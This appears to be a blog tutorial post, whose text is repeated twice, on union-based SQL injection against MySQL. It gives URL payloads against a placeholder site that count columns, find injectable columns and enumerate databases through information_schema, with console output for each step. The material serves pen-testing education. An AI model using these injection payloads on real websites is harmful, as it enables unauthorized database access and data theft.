Probing The Database
Okay, so now that we have the number of columns, database name and the Vulnerable Column(Injectable Column)
Lets take our step ahead into probing more into the database for further information.
A Quick Review:
http://www.example.com/index.php?id = 1
http://www.example.com/index.php?id = 1' --+
http://www.example.com/index.php?id=1' ORDER BY 3 --+ << Col Count is 3 as 4 gives Error
http://www.example.com/index.php?id = 1' UNION SELECT 1,2,3 --+ << This shows all 3 col
http://www.example.com/index.php?id = -1' UNION SELECT database(),current_user(),@@version --+
Now lets try to see the Tables.
As Usual first lets check in through MySQL, now the reason we check for the MySQL version becuase, MySQL version 5 and above has a database named information_schema, which is like a template which holds information about all database and tables. And we will use this to probe for data from databases.
in version 5 and above, information_schema is a template of all databases.
Now on the left side we have
SELECT * FROM Products where id = 1; << The normal workflow
Now we have to work on the right side,
Now as a pen tester we dont have any idea, how many database are there, their names, tables, columns etc. So lets see how we can probe and dump some information.
Lets first build our Query in MySQL server
1. To find the current database
mysql> select database();
+------------+
| database() |
+------------+
| ckorner |
+------------+
1 row in set (0.00 sec)
2. To see all tables
mysql> show tables;
+-------------------+
| Tables_in_ckorner |
+-------------------+
| admin |
| products |
| users |
+-------------------+
3 rows in set (0.00 sec)
But we cannot use 'show' command in our URL Query so this is invalid.
3. Find the Number of column in Use:
mysql> select * from products where id = 1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> select * from products where id = 1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
So 3 columns in use;
4. To find the Injectable Columns:
mysql> select * from products where id = 1 union select "foo", "baar", "spam";
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| foo | baar | spam |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select 1,2,3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 1 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
Okay, seems all Columns are injectable;
5. Finding database name, version
mysql> select * from products where id = 1 union select @@version,database(),3;
+--------+---------+-------+
| id | name | price |
+--------+---------+-------+
| 1 | Printer | 4500 |
| 5.5.16 | ckorner | 3 |
+--------+---------+-------+
2 rows in set (0.00 sec)
6. To find number of database
mysql> select * from products where id = 1 union select count(database()),2,3 from information_schema.schemata;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 8 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
So, this has 8 database;
7. Lets try to get the names of all Databases
mysql> select * from products where id = 1 union select table_schema,2,3 from information_schema.tables;
+--------------------+---------+-------+
| id | name | price |
+--------------------+---------+-------+
| 1 | Printer | 4500 |
| information_schema | 2 | 3 |
| cdcol | 2 | 3 |
| ckorner | 2 | 3 |
| mysql | 2 | 3 |
| performance_schema | 2 | 3 |
| phpmyadmin | 2 | 3 |
| webauth | 2 | 3 |
+--------------------+---------+-------+
8 rows in set (0.00 sec)
"information_schema" is a common database in all MySQL version 5 and above.
Lets check the information_schema database
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_CMP_RESET |
| INNODB_TRX |
| INNODB_CMPMEM_RESET |
| INNODB_LOCK_WAITS |
| INNODB_CMPMEM |
| INNODB_CMP |
| INNODB_LOCKS |
+---------------------------------------+
37 rows in set (0.00 sec)
mysql> desc tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | NO | | | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| TABLE_TYPE | varchar(64) | NO | | | |
| ENGINE | varchar(64) | YES | | NULL | |
| VERSION | bigint(21) unsigned | YES | | NULL | |
| ROW_FORMAT | varchar(10) | YES | | NULL | |
| TABLE_ROWS | bigint(21) unsigned | YES | | NULL | |
| AVG_ROW_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| INDEX_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_FREE | bigint(21) unsigned | YES | | NULL | |
| AUTO_INCREMENT | bigint(21) unsigned | YES | | NULL | |
| CREATE_TIME | datetime | YES | | NULL | |
| UPDATE_TIME | datetime | YES | | NULL | |
| CHECK_TIME | datetime | YES | | NULL | |
| TABLE_COLLATION | varchar(32) | YES | | NULL | |
| CHECKSUM | bigint(21) unsigned | YES | | NULL | |
| CREATE_OPTIONS | varchar(255) | YES | | NULL | |
| TABLE_COMMENT | varchar(2048) | NO | | | |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.00 sec)
mysql> desc columns;
+--------------------------+---------------------+------+-----+---------+-------
+
| Field | Type | Null | Key | Default | Extra
|
+--------------------------+---------------------+------+-----+---------+-------
+
| TABLE_CATALOG | varchar(512) | NO | | |
|
| TABLE_SCHEMA | varchar(64) | NO | | |
|
| TABLE_NAME | varchar(64) | NO | | |
|
| COLUMN_NAME | varchar(64) | NO | | |
|
| ORDINAL_POSITION | bigint(21) unsigned | NO | | 0 |
|
| COLUMN_DEFAULT | longtext | YES | | NULL |
|
| IS_NULLABLE | varchar(3) | NO | | |
|
| DATA_TYPE | varchar(64) | NO | | |
|
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES | | NULL |
|
| CHARACTER_OCTET_LENGTH | bigint(21) unsigned | YES | | NULL |
|
| NUMERIC_PRECISION | bigint(21) unsigned | YES | | NULL |
|
| NUMERIC_SCALE | bigint(21) unsigned | YES | | NULL |
|
| CHARACTER_SET_NAME | varchar(32) | YES | | NULL |
|
| COLLATION_NAME | varchar(32) | YES | | NULL |
|
| COLUMN_TYPE | longtext | NO | | NULL |
|
| COLUMN_KEY | varchar(3) | NO | | |
|
| EXTRA | varchar(27) | NO | | |
|
| PRIVILEGES | varchar(80) | NO | | |
|
| COLUMN_COMMENT | varchar(1024) | NO | | |
|
+--------------------------+---------------------+------+-----+---------+-------
+
19 rows in set (0.00 sec)
mysql>
This database doesn't seem interesting as of now, but in later post, we will see how important this database is.
So lets frame our Queries in the URL:
http://www.example.com/index.php?id= 1' union select 1,2,3--+
http://www.example.com/index.php?id= -1' union select count(database()),2,3 from information_schema.schemata--+
http://www.example.com/index.php?id= -1' union select table_schema,2,3 from information_schema.tables--+
The use of (-1) has already been explained, so that should not be a Question as to why -1
So this is all for this post, more in next post, hope you are Enjoying it.
Thank You!
Okay, so now that we have the number of columns, database name and the Vulnerable Column(Injectable Column)
Lets take our step ahead into probing more into the database for further information.
A Quick Review:
http://www.example.com/index.php?id = 1
http://www.example.com/index.php?id = 1' --+
http://www.example.com/index.php?id=1' ORDER BY 3 --+ << Col Count is 3 as 4 gives Error
http://www.example.com/index.php?id = 1' UNION SELECT 1,2,3 --+ << This shows all 3 col
http://www.example.com/index.php?id = -1' UNION SELECT database(),current_user(),@@version --+
Now lets try to see the Tables.
As Usual first lets check in through MySQL, now the reason we check for the MySQL version becuase, MySQL version 5 and above has a database named information_schema, which is like a template which holds information about all database and tables. And we will use this to probe for data from databases.
in version 5 and above, information_schema is a template of all databases.
Now on the left side we have
SELECT * FROM Products where id = 1; << The normal workflow
Now we have to work on the right side,
Now as a pen tester we dont have any idea, how many database are there, their names, tables, columns etc. So lets see how we can probe and dump some information.
Lets first build our Query in MySQL server
1. To find the current database
mysql> select database();
+------------+
| database() |
+------------+
| ckorner |
+------------+
1 row in set (0.00 sec)
2. To see all tables
mysql> show tables;
+-------------------+
| Tables_in_ckorner |
+-------------------+
| admin |
| products |
| users |
+-------------------+
3 rows in set (0.00 sec)
But we cannot use 'show' command in our URL Query so this is invalid.
3. Find the Number of column in Use:
mysql> select * from products where id = 1 order by 4;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> select * from products where id = 1 order by 3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
+------+---------+-------+
1 row in set (0.00 sec)
So 3 columns in use;
4. To find the Injectable Columns:
mysql> select * from products where id = 1 union select "foo", "baar", "spam";
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| foo | baar | spam |
+------+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from products where id = 1 union select 1,2,3;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 1 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
Okay, seems all Columns are injectable;
5. Finding database name, version
mysql> select * from products where id = 1 union select @@version,database(),3;
+--------+---------+-------+
| id | name | price |
+--------+---------+-------+
| 1 | Printer | 4500 |
| 5.5.16 | ckorner | 3 |
+--------+---------+-------+
2 rows in set (0.00 sec)
6. To find number of database
mysql> select * from products where id = 1 union select count(database()),2,3 from information_schema.schemata;
+------+---------+-------+
| id | name | price |
+------+---------+-------+
| 1 | Printer | 4500 |
| 8 | 2 | 3 |
+------+---------+-------+
2 rows in set (0.00 sec)
So, this has 8 database;
7. Lets try to get the names of all Databases
mysql> select * from products where id = 1 union select table_schema,2,3 from information_schema.tables;
+--------------------+---------+-------+
| id | name | price |
+--------------------+---------+-------+
| 1 | Printer | 4500 |
| information_schema | 2 | 3 |
| cdcol | 2 | 3 |
| ckorner | 2 | 3 |
| mysql | 2 | 3 |
| performance_schema | 2 | 3 |
| phpmyadmin | 2 | 3 |
| webauth | 2 | 3 |
+--------------------+---------+-------+
8 rows in set (0.00 sec)
"information_schema" is a common database in all MySQL version 5 and above.
Lets check the information_schema database
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
| INNODB_CMP_RESET |
| INNODB_TRX |
| INNODB_CMPMEM_RESET |
| INNODB_LOCK_WAITS |
| INNODB_CMPMEM |
| INNODB_CMP |
| INNODB_LOCKS |
+---------------------------------------+
37 rows in set (0.00 sec)
mysql> desc tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG | varchar(512) | NO | | | |
| TABLE_SCHEMA | varchar(64) | NO | | | |
| TABLE_NAME | varchar(64) | NO | | | |
| TABLE_TYPE | varchar(64) | NO | | | |
| ENGINE | varchar(64) | YES | | NULL | |
| VERSION | bigint(21) unsigned | YES | | NULL | |
| ROW_FORMAT | varchar(10) | YES | | NULL | |
| TABLE_ROWS | bigint(21) unsigned | YES | | NULL | |
| AVG_ROW_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES | | NULL | |
| INDEX_LENGTH | bigint(21) unsigned | YES | | NULL | |
| DATA_FREE | bigint(21) unsigned | YES | | NULL | |
| AUTO_INCREMENT | bigint(21) unsigned | YES | | NULL | |
| CREATE_TIME | datetime | YES | | NULL | |
| UPDATE_TIME | datetime | YES | | NULL | |
| CHECK_TIME | datetime | YES | | NULL | |
| TABLE_COLLATION | varchar(32) | YES | | NULL | |
| CHECKSUM | bigint(21) unsigned | YES | | NULL | |
| CREATE_OPTIONS | varchar(255) | YES | | NULL | |
| TABLE_COMMENT | varchar(2048) | NO | | | |
+-----------------+---------------------+------+-----+---------+-------+
21 rows in set (0.00 sec)
mysql> desc columns;
+--------------------------+---------------------+------+-----+---------+-------
+
| Field | Type | Null | Key | Default | Extra
|
+--------------------------+---------------------+------+-----+---------+-------
+
| TABLE_CATALOG | varchar(512) | NO | | |
|
| TABLE_SCHEMA | varchar(64) | NO | | |
|
| TABLE_NAME | varchar(64) | NO | | |
|
| COLUMN_NAME | varchar(64) | NO | | |
|
| ORDINAL_POSITION | bigint(21) unsigned | NO | | 0 |
|
| COLUMN_DEFAULT | longtext | YES | | NULL |
|
| IS_NULLABLE | varchar(3) | NO | | |
|
| DATA_TYPE | varchar(64) | NO | | |
|
| CHARACTER_MAXIMUM_LENGTH | bigint(21) unsigned | YES | | NULL |
|
| CHARACTER_OCTET_LENGTH | bigint(21) unsigned | YES | | NULL |
|
| NUMERIC_PRECISION | bigint(21) unsigned | YES | | NULL |
|
| NUMERIC_SCALE | bigint(21) unsigned | YES | | NULL |
|
| CHARACTER_SET_NAME | varchar(32) | YES | | NULL |
|
| COLLATION_NAME | varchar(32) | YES | | NULL |
|
| COLUMN_TYPE | longtext | NO | | NULL |
|
| COLUMN_KEY | varchar(3) | NO | | |
|
| EXTRA | varchar(27) | NO | | |
|
| PRIVILEGES | varchar(80) | NO | | |
|
| COLUMN_COMMENT | varchar(1024) | NO | | |
|
+--------------------------+---------------------+------+-----+---------+-------
+
19 rows in set (0.00 sec)
mysql>
This database doesn't seem interesting as of now, but in later post, we will see how important this database is.
So lets frame our Queries in the URL:
http://www.example.com/index.php?id= 1' union select 1,2,3--+
http://www.example.com/index.php?id= -1' union select count(database()),2,3 from information_schema.schemata--+
http://www.example.com/index.php?id= -1' union select table_schema,2,3 from information_schema.tables--+
The use of (-1) has already been explained, so that should not be a Question as to why -1
So this is all for this post, more in next post, hope you are Enjoying it.
Thank You!
0 comments:
Post a Comment